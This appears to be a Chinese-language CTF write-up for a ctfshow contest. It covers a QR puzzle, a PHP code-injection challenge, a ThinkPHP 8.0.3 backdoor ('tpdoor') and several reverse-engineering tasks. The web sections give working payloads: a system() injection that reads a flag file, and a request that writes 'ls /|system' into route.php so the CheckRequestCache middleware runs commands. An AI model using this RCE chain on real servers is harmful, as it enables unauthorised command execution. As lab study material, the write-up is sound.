misc

二维码拼图

屏幕截图 2024-07-05 232719

屏幕截图 2024-07-05 232645

ctfshow{2408979e-b2be-4442-b4d9-679ccb5b8298}

web

CodeInject

image-20240705202008290

1=system("cat /000f1ag.txt")

ctfshow{375b20aa-248f-421d-b570-cfdbf5fab5d6}

tpdoor

给了部分源码

<?php

namespace app\controller;

use app\BaseController;
use think\facade\Db;

class Index extends BaseController
{
    protected $middleware = ['think\middleware\AllowCrossDomain','think\middleware\CheckRequestCache','think\middleware\LoadLangPack','think\middleware\SessionInit'];
    public function index($isCache = false , $cacheTime = 3600)
    {
        
        if($isCache == true){		//弱类型
            $config = require  __DIR__.'/../../config/route.php';
            $config['request_cache_key'] = $isCache;
            $config['request_cache_expire'] = intval($cacheTime);
            $config['request_cache_except'] = [];
            file_put_contents(__DIR__.'/../../config/route.php', '<?php return '. var_export($config, true). ';');
            return 'cache is enabled';
        }else{
            return 'Welcome ,cache is disabled';
        }
    }



}

报错发现版本为V8.0.3

image-20240712141307010

21行关键位置,文件写入,估计是利用route.php

image-20240711230601783

image-20240711230458148

查看thinkphp源码

/config/route.php

image-20240712143842180

通过

$config = require __DIR__.'/../../config/route.php';

$config['request_cache_key'] = $isCache;

GET传参isCache改变$configrequest_cache_key对应值,然后通过 file_put_contents(__DIR__.'/../../config/route.php', '<?php return '. var_export($config, true). ';');

覆写进route.php

image-20240712145628341

在中间件WWW\tp\vendor\topthink\framework\src\think\middleware\CheckRequestCache.php中,每次请求都会读取route.phprequest_cache_key对应值,赋给$key

image-20240712152615972

再传入parseCacheKey函数

image-20240712151659054

而parseCacheKey中

        if (true === $key) {
            // 自动缓存功能
            $key = '__URL__';
        } elseif (str_contains($key, '|')) {
            [$key, $fun] = explode('|', $key);
        }

        if (isset($fun)) {
            $key = $fun($key);
        }

$key通过 explode函数分割‘|’前$key$fun,构造[参数]|[可变函数]执行RCE

因此,我们先get传一次?isCache=ls /|system覆写进route.php

屏幕截图 2024-07-12 135543

再任意请求一次传入中间件CheckRequestCache.php中parseCacheKey函数执行

屏幕截图 2024-07-12 135535

发现只能执行一次,后续无论怎么请求都是执行ls /,其实是全局请求缓存有效时间被固定3600s写入config了

image-20240712155959705

每次传的时候设置一下cacheTime就行,如

?isCache=ls%20/|system&cacheTime=3

image-20240712161536755

ctfshow{0a2bb4b0-ec7c-404f-abc5-ffa9b4bbef8b}

RE

pe

修复pe头可以获flag

image-20240705204414745

image-20240705204418999

image-20240705204437872

CTFShow{i95f5417b37c5e8019372de8737fI}

一个西瓜切两半你一半我一半

pyc逆向

正宗太极: 一个西瓜切两半你一半我一半
乃乾觅甯剏乳厡侻丨厏扝乌博丿乜规甲剌乶厝侥丿卻扚丠厘丿乎覟瓬剤

#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.6

flag = 'ctfshow{this_is_fake_flag}'
key = '这是假的密钥'
tmp = ''
for i in flag:
    tmp += chr(ord(i) - 32)

crypt = ''
for i in range(len(tmp)):
    crypt += chr(ord(tmp[i]) + ord(key[i % len(key)]))

print(crypt)

解密

crypt = '乃乾觅甯剏乳厡侻丨厏扝乌博丿乜规甲剌乶厝侥丿卻扚丠厘丿乎覟瓬剤'
key = '一个西瓜切两半你一半我一半'

# Step 1: Decrypt using key
tmp = ''
for i in range(len(crypt)):
    tmp += chr(ord(crypt[i]) - ord(key[i % len(key)]))

# Step 2: Reverse ASCII offset
flag = ''
for i in range(len(tmp)):
    flag += chr(ord(tmp[i]) + 32)

print(flag)  # Output: ctfshow{this_is_fake_flag}

ctfshow{Hell0_Reverse_Qi@n_D@0}

easy_re

探索进制的奥秘

屏幕截图 2024-07-06 000648

CTFShow{Thank_CTFSHOW_Sky}

E

逆个🥚

屏幕截图 2024-07-06 004533

本来盲猜换表,没想到直接base64

屏幕截图 2024-07-06 004903

CTFSHOW{JIAMI_SHOW_YAN}

总结

web手web是做不了一点,RE倒是差点AK,果然,我不配当web手,重生之我是re手